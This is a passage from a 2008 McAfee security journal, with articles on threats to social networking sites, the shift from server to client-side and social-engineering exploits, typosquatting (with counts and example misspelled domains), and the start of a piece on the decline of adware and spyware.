Anthony Bettini is a member of the Mcafee avert labs senior management team. He specializes in Windows security and vulnerability detection. Bettini has spoken at the national Institute of standards and Technologys national Information systems security conference in the Washington, D.c. area on anti-tracing techniques as well as for numerous global 2000 companies. While at Foundstone, he published new vulnerabilities found in Microsoft Windows, Iss scanner, PgP, symantec EsM, and other popular applications. Bettini was the technical editor for Hacking Exposed, 5th edition (Mcgraw-Hill).
ENDNOTES
1 goldsmith, Dave, and jeremy rauch; Matasano security. Hacking capitalism, Black Hat Usa 2007. august 2, 2007. 2 Financial Information eXchange, Wikipedia. april 20, 2008. http://en.wikipedia.org/wiki/Financial_Information_eXchange 3 random walk hypothesis, Wikipedia. May 15, 2008. http://en.wikipedia.org/ wiki/random_walk_hypothesis 4 Efficient Market Hypothesis, Wikipedia. May 15, 2008. http://en.wikipedia. org/wiki/Efficient_market_hypothesis 5 Past performance not indicative of future results, cBoE. May 22, 2008. http://www.cboe.com/micro/vix/faq.aspx 6 Martingale (probability theory), Wikipedia. May 22, 2008. http://en.wikipedia. org/wiki/Martingale_%28probability_theory%29 7 Emulex Hoax, Wikipedia. april 20, 2008. http://en.wikipedia.org/wiki/ Emulex_hoax 8 Firestone and Ford tire controversy, Wikipedia. april 20, 2008. http://en.wikipedia.org/wiki/Firestone_and_Ford_tire_controversy
ADDITIONAl REFERENCES
cBoEs archive of historic VIX data, using newer algorithm for the pre-
september 22, 2003 algorithm switch. april 20, 2008. http://www.cboe.com/ micro/vix/historical.aspx lo, andrew W. The adaptive Markets Hypothesis: Market Efficiency from an Evolutionary Perspective. journal of Portfolio Management. Financial metrics are primarily courtesy of Yahoo Finance. May 15, 2008. http://finance.yahoo.com additional financial metrics are courtesy of google Finance. april 20, 2008. http://finance.google.com
Fall 2008
27
The Future of social networking sites

By Craig Schmugar
In recent years social networking sitesMyspace, Facebook, and othershave become household terms. Many people think of social networking on the Internet as a relatively new phenomenon
when, in fact, sites such as classmates.com and sixDegrees. com have been around for more than a decade. still, the growth explosion has occurred only during the past few years. so what exactly makes a site a social networking venue? at the core, social networking sites are those that comprise an online community which allows users to share information, discover new contacts, and reconnect with old ones. social networking sites are significant for two main reasons. First, they are the epitome of Web 2.0, in which the network of users is the platform and the community drives the content. The platform grows through user contributions, enabled by applications provided for community use. second, social networking sites combine elements of communication channelssuch as email, message boards, instant messaging, and chatwith media vehiclessuch as audio, video, and print. In these communities, like-minded individuals can share information and interests and provide feedback and reviews. such sites can act as collaborative platforms, allowing entire networks to grow in value as the user base increases. Furthermore, these platforms allow for the most direct and targeted media outlets ever seen; businesses can focus their marketing efforts on those who are truly interested. social networking sites contain a warehouse of information that can be mined and analyzed to expand user profiles and to build complex diagrams and maps of user-to-user and user-to-interest relationships. Key to the success of any social networking site is a strong and loyal user base. Friendster.com knows this all too well. Friendster was the precursor to Myspace and by far the numberone social networking site during its prime. What happened to it? Friendster was a sort of success catastrophe. as the user base grew more massive and the content evolved (including the addition of games), the back end failed to keep up with the growth. site administrators were forced to restrict high-bandwidth content, but even still performance was unsatisfactory and the user base jumped ship. Furthermore, Friendster attempted to fit the user base into their predetermined model of how the network should be used and by whom. Myspace provided a more robust platform, not only because of its greater bandwidth, but also in the level of freedom users enjoyed to create, modify, and view a wider variety of content. once the word got out that Myspace was the new Friendster, it didnt take long for a majority of users to make the switch. a few takeaways from this early battle in social networking are that the platform needs to be flexible, it needs to expand and evolve, and user retention is key. These principles are paving the way for the future of social networking sites.
social Insecurity
Myspace was able to overtake Friendster in part by allowing users to highly customize their profiles. But this opened the door for attackers to insert malicious code as well as launch convincing phishing attacks directly from their Myspace profiles. Unfortunately such user flexibility lends itself to exploitable conditions, which the bad guys use and abuse. In a race for market share and in an effort to avoid being the next Friendster, security has taken a back seat for many social networking sites. consequently, social networking sites have been hosts to worms, phishing attacks, vulnerabilities, data harvesting and leakage, rogue ad distribution, defamation, and last, but not least, spam.
28
Where are We now?

Two and a half years after samy, the first widespread social networking worm released on october 4, 2005, hit the scene, most old security vulnerabilities had been patched. But the problem has not gone away. Until security flaws result in fewer subscribers, vulnerabilities will be common, and cross-site scripting vulnerabilities, such as that exploited by samy, are one of the most widely reported types of vulnerabilities in the common Vulnerabilities and Exposures database.1 and the situation is likely to get worse before it gets better. In May 2007, Facebook launched the Facebook platform, which allowed third-party developers to author and market applications to Facebooks 20 million active users. one year and 50 million additional users later, more than 20,000 Facebook applications have been developed, with 95 percent of the user base having run at least one application.2 These applications pose additional risksas users may have a false sense of security because of the applications association with a site they trust, Facebook.com. Yet the vast majority of these applications are released by developers without prior review by the site. In january 2008, Facebook banned the application secret crush after it was reported to have led users to install Zango adware.3 (see Figure 1 for other examples of widespread threats.) The significance is that Facebook doesnt review applications, and things can (and have) slipped by. although this reported case was more of an annoyance (adware), the next could be much worse.
Each time you click a link, rate a blog, or chat on a specific subject, the site can gain intelligence about you to enhance your social network.
approximately nine months after Facebook launched its platform, Myspace followed suit, and recently google released an application program interface (aPI) for orkut, googles social networking site. although these platforms have set the stage for the next generation of social networking sites, they have also created another vector for attackers to exploit.
What lies ahead?

Future social networking sites will become more important because platforms will expand further. Killer apps will include mobility, presence, and location awareness, with the goal of making your physical life more convenient through your virtual network; youll have a traveling social network in your back pocket. not only will you be able to know which of the friends in your network is online, but youll also be able to know which are nearby. cell tower triangulation and global positioning systems will be able to pass along your location to whomever you allow. location-aware services could match local businesses and entertainment to your interests based on your profile. Business travelers could more easily rendezvous with coworkers and clients at conferences and trade shows. The thrill of online dating could be heightened through the creation of location-specific communities, so you wouldnt only meet someone online, but you could also chat with a prospective mate in the same room. social sites will also be smarter, mining user information across the web. social bookmarking site functionality such as Digg will be married with social networks and enhanced with self-learning technology such as Pandora or stumbleUpon and tagging functionality such as Flickr. The result is a more constant and refined stream of relevant information, which actually educates and informs the community in a much more efficient manner than occurs today. From your iPhone, youll be able to get movie recommendations from those in your network. Youll also be able to read reviews that your friends found helpful and find show times for the theaters in your vicinity, and then youll be able to check the location of your friends to determine how quickly they can meet you.
Profiled social networking threats
THREAT
TYPE
SITE
Grey Goo JS/QSpace JS/SpaceFlash JS/SpaceTalk Kut Wormer Mass leak of private photos PWS-Banker! 1d23 Samy Scrapkut Secret Crush Xanga Worm
worm worm worm info stealer worm data loss password stealer worm worm unwanted program worm
Second Life MySpace MySpace MySpace orkut MySpace orkut MySpace orkut FaceBook Xanga
Figure 1: Worms and other threats have plagued social networking sites. Users often trust their community sites too much.
Fall 2008
29
sites will understand your interests based on your behavior: web sites you visit, articles you read, music you listen to, friends you chat with and what their interests are, for example. This information will be used to keep you current on changing events and to filter the noise that bombards users today. Youll be left with a highly customized web experience that requires very little direct user input. Whereas Web 1.0 was driven by site administrators and Web 2.0 was driven by user-generated content, the future of social networking lies in user and content relationships augmented by user behavior to tailor content. Early incarnations of next-generation sites, called social networking 3.0, may in fact be perceived as spooky in the level of accuracy of this artificial intelligence. Profiling takes on a different meaning in this realm, where the site can actually bring together users of similar interests. In some respects, compatibility profiling used by online dating services could be considered an early incarnation of creating social connections through online profiling, bringing compatible people together; but in social networking 3.0 this concept is significantly expanded without the need to complete a lengthy questionnaire. Each time you click a link, rate a blog, or chat on a specific subject, the site can gain intelligence about you to enhance your social network. Who will benefit from this explosion of information correlation? of course, the user base is a driving factor, but others seek to benefit from this arrangement. advertisers are drooling at the notion of higher conversion rates when marketing happens at the users level based on their specific interests. More users will actually pay attention to the ads and take an interest in their content.
The increased use of open and portable profiles, mash-ups (web applications that combine content from various sources into a single tool), and open aPIs will dramatically facilitate cross-site usage, but will also increase the complexity in defending against threats targeting these vectors. Multitiered attacks are difficult to pinpoint today and will be even more so tomorrow. attacks may originate from one site only to be propagated through another before appearing on an affected social network. Hostbased defenses will need to negotiate the relationships sites have with one another to piece together valid and invalid site interactions and weed out the good from the bad. Many users will find the privacy concerns in this articleinformation harvesting and correlation, and location trackingto be too great to ignore. Indeed, many people will not opt into such services. However, when users see that they can benefit from providing a little bit of data and they have established trust relationships, many of them will volunteer some details. Vendors are acutely aware of this and are encouraging users to take baby steps, such as allowing locations to be reported granularly only by state or city, for example. Unfortunately, online predators will be lurking, and security vulnerabilities can have dire consequences when such information falls into the hands of the bad guys. This is an exciting time for social networking sites, which are rapidly expanding, adding functionality, and growing their user bases. These sites have multibillion-dollar valuations. Big changes lie ahead that are both compelling and threatening; in many ways the future of social networking sites defines the future of the Internet itself.
risks Increase
as user benefits increase, so will opportunities for attackers. spammers and scammers will look to exploit this treasure trove of information and will more easily construct convincing social engineering attacks with all this data. Users will be taken off guard by the level of detail and personalization in attack messages. social botnets will also have the potential to seriously disrupt the ecosystem, poisoning the network with solicitations and false testimonials. site administrators will have their work cut out for them to keep the content quality high, while blocking the bad guys and still allowing everyone else to use the site as it is intended. securing future social networks will depend more heavily on server-side defenses. Back-end systems will need to scan large amounts of incoming and outgoing data, searching for evidence of mischief or malicious code. site and content reputation services may help balance usability and security. The trust relationship between sites and users is key to the success of tomorrows networks. Violation of that trust could lead to the failure of an entire community.
Threat researcher Craig Schmugar has been researching and combating threats for Mcafee avert labs since 2000. since then he has discovered and classified thousands of new threats, including the Blaster, Mydoom, Mywife, and sasser worms. He admits that during this time he is starting to feel more anti-social.
ENDNOTES
1 http://cwe.mitre.org/documents/vuln-trends/index.html 2 http://www.facebook.com/press/info.php?statistics 3 http://www.zdnet.com.au/news/security/soa/spyware-claims-kill-off-Facebooks-secret-crush/0,130061744,339284896,00.htm?omnref=http://www.google. com/search?num=100
30
The changing Face of Vulnerabilities

By Rahul Kashyap
although social engineering does not play a role in all forms of security threats, Mcafee avert labs has observed a growing trend recently: malware writers using social engineering to exploit software vulnerabilities.
Most of the infamous Internet worms in the first half of this decade typically exploited one or more vulnerabilities in Microsoft applications. The notorious sasser, Blaster, code red, and sQl slammer had a common factor. (By the way, avert labs discovered sasser and Blaster, as well as other significant malware.) They all exploited server vulnerabilities. The intent of these worms was to destroy servers via quick self-propagation after exploiting the flaws. although products from many vendors have suffered from similar security holes, we will primarily focus on vulnerabilities and trends in Microsoft products in this article. Were not singling out Microsoft as being particularly vulnerable, but rather acknowledging that the popularity of Microsoft products among consumers and businesses attracts malware writers and data thieves like no other target. avert labs has seen that server vulnerabilities that can be exploited by worms have diminished in the past few years thanks to increased use of security measures that protect remote procedure calls. To illustrate, Figure 1 lists all the remotely exploitable vulnerabilities via Microsoft Windows remote procedure calls during a 10-year period through the first quarter of 2008. The trend has fallen dramatically in the last two years. We see a similar trend if we sample remotely exploitable vulnerabilities for other popular Microsoft server platforms, such IIs Web server, sQl server, and others. Microsoft further increased its defenses with the release of service Pack 2 for Windows XP. along with other protection mechanisms, sP2 included data execution prevention,2 whichthough not foolproof3definitely helped in curbing the network worm propagation that plagued Windows at that time. The effects of XPs sP2 became much more visible a couple of years later, as many users migrated to the updated operating system. However, malware writers were not to be outdone. They quickly shifted their focus from server to clients, uncovering vulnerabilities in Microsoft office, Microsoft Internet Explorer, and various proprietary file formats. The client assault gave birth to a host of fuzzers4 (which search for security holes by throwing random data at an application), scripting-language parsing bugs, and activeX controlrelated vulnerabilities. Projects such as the Month of Browser Bugs5 (and others), axfuzz,6 coMraider, and hamachi7 increased interest in this area and helped expose the innumerable issues plaguing client software. Bug discovery and the exploitation of client applications has been at its peak
Microsoft remote vulnerability patches
14 12 10 8 6 4 2 0 1998 1999 2000 2001 2002 2003 2004 2005 2006 2007 2008
Figure 1: Microsoft has significantly tightened the security of its remote procedure calls since 2006. (Source: Microsoft1).
Fall 2008
31
45 40 35 30 25 20 15 10 5 0
Office vulnerability patches
Targeted attacks
The key to client vulnerabilities is that they need user interaction to be exploited. Hence malware authors have had to come up with more innovative ideas to lure users into clicking links and downloading images and documents from the Internet. one of the main thrusts for exploiting client systems has been a rapid growth in spam that relies on social engineering. social engineering and the focus on client vulnerabilities go hand in hand. The connection between these two factors is obvious, and the threat has recently become more complex.
1998
1999
2000
2001
2002
2003
2004
2005
2006
2007
2008
Figure 2: Microsoft Office vulnerabilities increased in 2006 and have remained high in the two successive years. (Source: Microsoft).
during this period; this trend continues even as we prepare this journal. The numbers of client software being exploited is hard to determine, but some sources claim the figure to be in the hundreds of millions.8 Figure 2 offers a vivid picture on the sudden spike of vulnerabilities for Microsoft office. These peaked in 2006 and continue to keep Microsoft busy. The majority of these vulnerabilities have affected office 2000. This version is widely used, thus it has been more widely exploited. In the economics of malware writers, vulnerabilities in office 2000 offer a better return on investment. This is primarily because this suite has long had a major security disability: office 2000 users must visit Microsofts office update page to download patches9, and the automatic online updates do not serve office 2000 or office 97. This oversight creates a terrific opportunity for malware writers to exploit the fact that many users are unlikely to regularly update their office suites.10 The number of zombie machines taken over because of this type of security hole could be in the tens of thousands. although were focusing on vulnerabilities in Microsoft products in this article, the trend affects other popular client software vendors, such as adobe, Mozilla, apple, and more. The Month of apple Bugs highlighted many client problems, and there has been a big spike in the vulnerabilities found in widely used software, such as apple QuickTime, adobe Flash Player, and adobe reader, to name just a few. The recent exploitation of the PDF mailto: vulnerability (cVE-2007-5020)11 and of Flash using actionscript (cVE-2007-0071) were among some of the critical flaws that affected thousands of users.
Part of that complexity lies in targeted social engineering attacks, which are the emerging trend in the threat landscape. Targeted attacks are especially popular in defense and military establishments.12 Ever since the rash of office vulnerabilities in 2006, multiple reports have appeared about government agencies receiving emails with malicious Word, PowerPoint, or access files. It looks like the combination of social engineering and vulnerabilities has found another target: espionage. spying, of course, is stealthier and much more difficult to uncover than a merely profit-driven attack. on multiple occasions, the vulnerabilities discovered in these malicious embedded documents have been zero-day attacks, which make these document files even more difficult to detect: these vulnerabilities are often found only after the damage is done. Because these zero-day vulnerabilities have targeted specific government or military installations, its possible that these attacks could be sponsored by foreign agents or governments. custom-designed social engineering, zero-day vulnerabilities, money, and power sound like elements of a john le carr novel. some security analysts think this is not fiction. Many theorists have predicted that the next generation of warfare will be in cyberspace. Perhaps all of these events are just test cases for a cyberwar?
stealthy Web Hacks

other exploits that have changed in recent years are web server hacking and hijacking. Earlier attackers used to deface web sites after they hacked themusually leaving a note on the site in the hope of becoming famous. Thats no longer the case, at least not with todays new generation of sophisticated hackers. With the plethora of client vulnerabilities, hackers have started exploiting these in a coordinated manner, spreading malware by first compromising popular web sites, stealthily planting malware, and luring users via social engineering tricks. as a leading example, the super Bowl (american football final) hack in February 2007 deserves mention, as it involved the insertion of a malicious javascript into the home page of the
32
official site.13 The script exploited two flaws in Internet Explorer and infected unpatched users with a Trojan that connected to a chinese server, giving full access to the compromised machine. similar stealthy hacks have been reported for many popular web sites, including embassies, newsgroups, and corporations. another emerging threat that made millions of homes vulnerable was exploiting home routers via Universal Plug and Play, which allowed a malicious Flash file embedded in a web page to reconfigure the victims router.14 (The fact that the vast majority of Internet users use the default passwords in their home routers helps make this attack possible.) In this situation the victim could be lured by any seemingly innocuous link to pay bills online or read more about some topic. Most likely the user would have no clue that the router had been compromised, with all traffic including sensitive passwordsbeing sent to someone else.
This could be the perfect time for these techniques to leverage social engineering tricks as one of the attack vectors for several reasons:
currently there arent any publicly known reliable, automated ways to exploit these new techniques (mainly for mass propagation) They can be easily tested on targeted individuals or groups via social engineering as a part of the development process The return on investment for these techniques is higher using social engineering than in putting the effort into further research to achieve mass propagation
conclusion
With the recent trends in vulnerabilities, social engineering is a force that is difficult to combat. no matter how many protection mechanisms vendors implement in their software and operating systems, effective social engineering can subvert them all as long as users continue to click on any link that they come across. We cant expect cyber laws to thwart social engineering any time soon (except for filing charges for fraud), but increased education can definitely help minimize losses and the impact on unsuspecting victims. In the meantime, think twice when youre asked to click to accept that prize youve just won!
new Vectors of Exploitation

The early half of this decade saw extensive exploitation of stack, heap, and integer overflows, format-string vulnerabilities, and other weaknesses, most of which were relatively easy to exploit from a technical viewpoint. now, however, most of these simple stack overflows are no longer a big threat in widely used software, such as Windows, because of superior software development and quality assurance testing. In addition, technologies like address space layout randomization have challenged hackers to go beyond traditional exploitation mechanisms. attacking vulnerabilities has entered a new phase, where exploiting concepts such as null pointers15 and race conditions16as well as developing reliable exploitation techniques like heap spray17are gaining popularity. Many of these bugs have been around for a long time and had been thought unexploitable.
Rahul kashyap is the Manager, Vulnerability research and IPs security for Mcafee avert labs. He is responsible for vulnerability research, zero-day analysis, intrusion prevention system content, and emergency response. Kashyap is a big Dilbert fan and hopes to start his own geeky security-focused comic strip some day.
ENDNOTES
1 http://www.microsoft.com/technet/security/current.aspx 2 How to configure Memory Protection in Windows XP sP2. http://www.microsoft.com/technet/security/prodtech/windowsxp/depcnfxp.mspx 3 analysis of gs protections in Microsoft Windows Vista. http://www.symantec.com/avcenter/reference/gs_Protections_in_Vista.pdf 4 Browser Fuzzing for fun and profit. http://blog.metasploit.com/2006/03/ browser-fuzzing-for-fun-and-profit.html 5 Month of Browser Bugs, http://blog.metasploit.com/2006/07/month-ofbrowser-bugs.html 6 aXFUZZ: an activeX/coM enumerator and fuzzer. http://sourceforge.net/ projects/axfuzz/ 7 Hamachi, by H D Moore and aviv raff. http://metasploit.com/users/hdm/tools/ hamachi/hamachi.html 8 637 million Users Vulnerable to attack, Frequency X. http://blogs.iss.net/ archive/TheWebBrowserThreat.html 9 Keep your operating system updated: Frequently asked questions. http:// www.microsoft.com/protect/computer/updates/faq.mspx 10 Ms office Flaws Ideal Tools for Targeted attacks. http://blog.washingtonpost. com/securityfix/2006/04/ms_office_flaws_ideal_tools_fo_1.html 11 http://www.gnucitizen.org/blog/0day-pdf-pwns-windows/ 12 The new E-spionage Threat. http://www.businessweek.com/print/magazine/ content/08_16/b4080032218430.htm 13 Dolphins Web sites hacked in advance of super Bowl. http://www.networkworld.com/news/2007/020207-dolphins-web-sites-hacked-in.html 14 Hacking the interwebs, january 12, 2008. http://www.gnucitizen.org/blog/ hacking-the-interwebs/ 15 application-specific attacks: leveraging the actionscript Virtual Machine. http://documents.iss.net/whitepapers/IBM_X-Force_WP_final.pdf 16 Unusual Bugs, Ilja van sprundel. http://www.ruxcon.org.au/files/2006/unusual_bugs.pdf 17 Heap Feng shui in javascript. http://www.determina.com/security.research/ presentations/bh-eu07/bh-eu07-sotirov-paper.html
Fall 2008
33
Unintended adventures In Browsing

By Benjamin Edelman
Browse the web, and you may be exposed to a variety of attacks that are well chronicled in the McAfee Security Journal.
From malicious banners to adware bundlers, the sites you intend to visit may cause remarkable harm. But users should also be aware of the sites they do not intend to visitthe sites they stumble across by accident. so squatters also claim domains such as www.mcafeecom. com. still other squatters focus on adding http prefixes, or registering the corresponding .coms for domains that actually reside in other top-level domains. How do users end up at these typosquatting sites? some users may forget a sites correct spelling. others make typing errors. (consider non-native English speakers, users with poor eyesight, and users still improving their typing skills.) novice users may not realize the correct punctuation of a sites full address, and hurried users may wrongly enter part of a Url. Even the most sophisticated user can make an entry error on a mobile device with a small keyboard, on a handwriting-recognition tablet, or during a bumpy ride in a moving vehicle. so it would be wrong to blame the users who request typosquatting sites. on the contrary, although users certainly end up at these sites, they generally get there by mistake.
Basic strategy
For those of us who sometimes slip up when typing a Url, theres a special kind of security threat to watch out for. This plague of the imperfect typist is called typosquatting. The typosquatter strategy is to anticipate domain names users might accidentally request. consider a user who misspells bankofamerica.com by doubling the k and dropping the e to yield bankkofamrica.com. ordinarily, that user would receive a browser error message, directing the user to the real Bank of america site. But suppose a typosquatter had anticipated the users error. The typosquatter might register the misspelled domain (and several other inaccurate names) in hopes that users will eventually wander in. Historically, typosquatters primarily focused on spelling errors inserting a stray letter, dropping a letter, or transposing two letters. But recently typosquatters have found other tricky ways to attract unintended traffic. suppose a user omits the period that separates www from a sites domain name, for example, wwwmcafee.com instead of www.mcafee.com. Typosquatters can register that domain. (as it turns out, someone did! and Mcafee is working to recover it.) In the case of trailing periods, typosquatters rightly anticipate that web browsers will automatically append a .com to a domain with no top-level domain
The scope of Typosquatting

With many users making a wide variety of errors, typosquatting has become remarkably widespread. The Mcafee siteadvisor service runs ongoing searches for typosquatters, and in the Mcafee avert labs May 2008 examination, we found more than 80,000 domains typosquatting on just the top 2,000 web sites. go deeper into the web, and typosquatting grows even more.
34
Domains frequented by kids are particularly rich targets for typosquatters. For example, a recent analysis identified 327 different typosquatting registrations that are all close variants of cartoonnetwork.com. Freecreditreport.com led the list compiled with siteadvisor technology; also popular were YouTube, craigslist, Wikipedia, and Bank of america. (For the numbers, see Figure 1. and for examples of creative misspellings, see appendix.)
complaints about infringing domains. To register a site in a major top-level domain, a registrant must agree to the UDrPs jurisdiction, so the UDrP applies regardless of the location of the typosquatting site. That said, UDrP remedies are limited to the forfeiture of an infringing domain without a payment of money damages. although the acPa imposes significant penalties, typosquatters seem to realize that enforcement is unlikely. so despite the threat of major sanctions, typosquatters continue to operate with abandon.
legal response
In general, typosquatting is illegal in the United states. The 1999 anti-cybersquatting consumer Protection act (acPa), 15 Usc 1125(d), prohibits registering, trafficking in, or using domain names that are identical to, or confusingly similar to, a trademark or famous name. The acPa grants damages of a typosquatters ill-gotten profits (15 Usc 1117(a)(1)), or statutory damages of $1,000 to $100,000 per typosquatting domain (as the court considers just) (1117(d)). other countries laws treat typosquatting somewhat differently, but most nations view typosquatting as a genre of trademark infringementhence it is prohibited. Furthermore, the Uniform Dispute resolution Policy (UDrP) establishes arbitration for
Typosquatters Profit strategy

once a user arrives at a typosquatting site, the squatter wants to make as much money as possible. some years ago, notorious typosquatter john Zuccarini forced his unwitting visitors to view sexually explicit web sites they did not want and had not requested. Zuccarini registered at least 8,000 domains, which I documented at length.1 But he didnt get away with this scam forever: In september 2003, Zuccarini was arrested for violation of the Truth in Domain names act, which specifically prohibits any action that uses a misleading domain name with the intent to deceive a person into viewing obscenity. These days, the typosquatters standard approach is advertising. among the thousands of typosquatting domains Ive examined in the past several years, its rare to find one not showing ads.
DOMAIN
NUMBER OF TYPOSQUATTING DOMAINS
freecreditreport.com cartoonnetwork.com youtube.com craigslist.org blogspot.com clubpenguin.com wikipedia.com runescape.com miniclip.com bankofamerica.com dailymotion.com metroflog.com addictinggames.com friendster.com myspace.com verizonwireless.com facebook.com
742 327 320 318 276 271 266 264 263 251 250 249 248 246 239 238 235
The McAfee SiteAdvisor service runs ongoing searches for typosquatters, and in the McAfee Avert Labs May 2008 examination, we found more than 80,000 domains typosquatting on just the top 2,000 web sites.
Figure 1: Typosquattings most-popular list. This table reports a selection of trademarks highly targeted by typosquatters. The data comes from the May 2008 examination of the SiteAdvisor service data set.
Fall 2008
35
Figure 2: A typosquatter registers a domain name similar to a leading banks, and thenindirectlysells advertising links to that and other banks.
When typosquatting sites show ads, they typically attempt to select ads relevant to the site the user was (in all likelihood) trying to reach. so in the bankkofamrica.com example we mentioned, the resulting ads promotepredictablybanks. Which banks? First on the list is Bank of america itself. (see Figure 2.) surprised? on the one hand, that ad placement is useful for Bank of america: at least they manage to reach the customer, despite the customers typographic error. But on the other hand, its remarkable for this typosquatter to ask Bank of america to pay to reach a customer who already requested Bank of america by name. after all, the typosquatter is infringing Bank of americas trademark, exactly in violation of the acPa, which says that the typosquatter cant register such domains and that
the typosquatter even has to pay Bank of america high statutory damages if the bank files a suit. But instead, the typosquatter ends up selling advertising space to Bank of americawhich, at least initially, may be none the wiser. How is this possible? Typosquatters dont directly sell space to advertisers. (Imagine the conversation: Wed like to show your ads on our typosquatting site? You want to put our ads where?) Instead, typosquatters sell their inventory to ad networks, which in turn recruit advertisers. The largest network in this space is google, whose adsense for Domains product and other domain-syndication products serve ads on more than 80 percent of the typosquatting sites recently uncovered by siteadvisor technology.
36
Whats next for Typosquatters?

In june 2008, the Internet corporation for assigned names and numbers (Icann) voted to speed the process of creating more top-level domains. Beyond the familiar domains most users know, there are already lesser-used domains such as .info, .biz, .museum, and .travel. soon, we can expect new domains like .nyc or .lib (as some have suggested). More top-level domains mean more opportunities for cybersquattingfor exact registration of famous trademarks, or for close typographic variations of famous names. When users request these domainswhether in misguided attempts to reach the real sites, or in mistaken attempts to recall sites true addressestyposquatters can jump in with their infringing interlopers. But there are signs that typosquatting may soon be on the decline. For one, some major web sites have taken action to protect themselves and their customers from typosquatters. For example, in 2006, neiman Marcus sued domain registrar Dotster. neiman Marcus alleged that Dotster registered scores of domains infringing neiman Marcus marks, showing ads to maximize its revenues from these typosquatting sites. neiman Marcus claimed Dotster acted not just as registrar for these domains, but also as registrant, choosing which domains to register, and reaping the profits from resulting ads. The case settled in 2007 on confidential terms, and neiman Marcus has since gone on to sue other large squatters. (Disclosure: I served as a consultant to neiman Marcus in some of these cases.) Verizon and Microsoft have also been vigilant in similar litigation. on one hand, these cases arent particularly prevalent. But the acPas statutory damages$1,000 and more per domaincan force typosquatters to pay big money for their large-scale infringements. Microsoft alone has received more than $2 million in typosquatting settlements. Further, persistent rumors suggest top ad networks, particularly google, may abandon the typosquatting industry. recent trademark-holder class-action litigation has challenged googles role in funding the typosquatting industry, and these typosquatting placements have been a repeated source of advertiser and trademark-holder complaints. If google ceased funding typosquatting,
typosquatters would have far less incentive to register infringing domains; no other ad network is likely to pay typosquatters as much as google does. (Disclosure: I serve as co-counsel in Vulcan golf, et al., v. google, et al., trademark-holder class-action litigation regarding googles responsibility for the typosquatting sites where google pays to place ads.)
Defenses
Though the typosquatting battles continue, concerned users can do plenty to protect themselves. First, be careful when you type. Be alert for typosquatting, particularly when requesting a site thats hard to spell. guessing a domain name may not be the best choice; consider using a search engine instead. second, after arriving at a site, look twice before you proceed. Is this really the site you intended to reach? Is this link an ordinary pointer, or a paid advertisement? should this government site really be a .com, or did you want the corresponding .gov? a bit of critical thinking may serve you well as a defense against typosquatting or other attacks. appropriate software can also help protect users from typosquatters. siteadvisor technology identifies many typosquatting sites. a typo-protection service, such as openDns, provides additional protection. search engines typically offer helpDid you mean? spelling correctionso that users can avoid many typosquatting sites by running searches instead of typing domain names directly into a browsers address bar.
Benjamin Edelman is an assistant professor at the Harvard Business school, where he studies electronic marketplaces and online fraud. He is also a special advisor to Mcafee for the siteadvisor service, offering an independent perspective to supplement siteadvisor site ratings. Though a fast and accurate typist, Professor Edelman has occasionally embarked on unintended browsing adventures.
ENDNOTES
1 large-scale registration of Domains with Typographical Errors, january 2003. Harvard law school. (http://cyber.law.harvard.edu/archived_content/people/ edelman/typo-domains/)
APPENDIX
Examples of Typosquatting Sites: Cartoonnetwork.com among the more than 80,000 domains in siteadvisors May 2008 examinations we found these typosquatting variations of cartoonnetwork.com: ccartoonnetwork.com dcartoonnetwork.com ncartoonnetwork.com cfartoonnetwork.com ceartoonnetwork.com ckartoonnetwork.com jcartoonnetwork.com vcartoonnetwork.com caertoonnetwork.com caortoonnetwork.com cairtoonnetwork.com cuartoonnetwork.com acartoonnetwork.com bcartoonnetwork.com canrtoonnetwork.com
Fall 2008
37
Whatever Happened To adware and spyware?

By Aditya Kapoor
adware and spyware are two of the primary tools used for the online promotion of advertising and marketing.
These applications often benefit from social engineering methodologies and often piggyback on an otherwise useful freeware or shareware application that a user wants to download. These unwanted applications typically come with end-user license agreements (EUlas) that are supposed to define their behavior. However, these descriptions are normally not explicit or useful, causing confusion for users and opening the door to further social engineering traps. In the first half of this decade, adware and spywareoften called potentially unwanted programs, or PUPsgrew exponentially. after 2005, however, we have seen a constant decline in their numbers. In this article well highlight the key changes in online compensation models that are the driving factor of this decline. adware and spyware have mostly split into distinct fields: the former with cleaner applications and a better userconsent model developed by key adware players and the latter sometimes malicious and frequently defined as Trojan malware. This comparatively clean divide has helped keep the numbers of adware and spyware applications low. so if these PUPs are no longer a threat, will they soon be gone for good? To answer that, we will discuss the changing threat landscape and the role social engineering plays.
Adware a type of advertising display software that delivers advertising content potentially in a manner or context that may be unexpected and unwanted by users. The ascs risk Model document details many of the behaviors that may be considered unexpected or unwanted. Many adware applications also perform tracking functions and, therefore, may also be categorized as tracking technologies. some consumers may want to remove adware if they object to such tracking, do not wish to see the advertising caused by the program, or are frustrated by its effects on system performance. on the other hand, some users may wish to keep particular adware programs if their presence subsidizes the cost of a desired product or service or if they provide advertising that is useful or desired, such as ads that are competitive or complementary to what the user is looking at or searching for. Spyware In its narrow sense, spyware is a term for tracking software deployed without adequate notice, consent, or control for the user. In its broader sense, spyware is used as a synonym for what the asc calls spyware (and other Potentially Unwanted Technologies): technologies deployed without appropriate user consent and/or implemented in ways that impair user control over: Material changes that affect their user experience, privacy, or system security Use of their system resources, including what programs are installed on their computers collection, use, and distribution of their personal or other sensitive information
seeking clarity
The terms adware and spyware are frequently used loosely and interchangeably and often create confusion. Well follow definitions supplied by the anti-spyware coalition (asc).1
38
acknowledging that the common term spyware has now largely drifted from its exact meaning, the members of the asc have decided to use spyware (in its narrow sense) for technical documents. recognizing further that it is impossible to avoid the wider connotations arising from popular usage, the asc also notes the existence of a general interpretation that includes all PUPs. In this article, the term spyware is never used in its broad sense, but always in the narrow sense, namely, as software that is related to marketing. We use the term monitoring software to define pure spy programs such as keyloggers.
as traffic and payments increase, john could decide to use an exploit to install the adware application without the users being aware of the installation. Many such applications display a EUla before installing, but this would only alarm visitors, so john might further decide to tweak the application to suppress the EUla and increase his installation score. now if john is a seasoned hacker, he could replicate this model on thousands of compromised sites to exponentially increase his installations and payoff. Fellow McAfee Security Journal author Benjamin Edelman describes a similar, real scenario on his web site.5
a Fast Takeoff
adware and spyware grabbed our attention in the year 2000 with the appearance of adware-aureate, which employed the users browsing history to display ads. This move led to the creation of one of the first anti-spyware applications, gibson research corp.s optout.2 adware and spyware started growing prominently around late 2004 and peaked in 2005. (see Figures 1 and 2.) The primary motive was to generate revenue via millions of installations on users desktops (via the pay-per-installation model) as well as to display advertisements (via the pay-per-click model). The adware and spyware industry flourished in these years due to the large amount of revenue generated from ads. Every time a user clicked a certain ad, the ad provider received a commission.
Adware 5000
4000 3000 2000 1000 0 2000 2001 2002 2003 2004 2005 2006 2007
forecast
2008
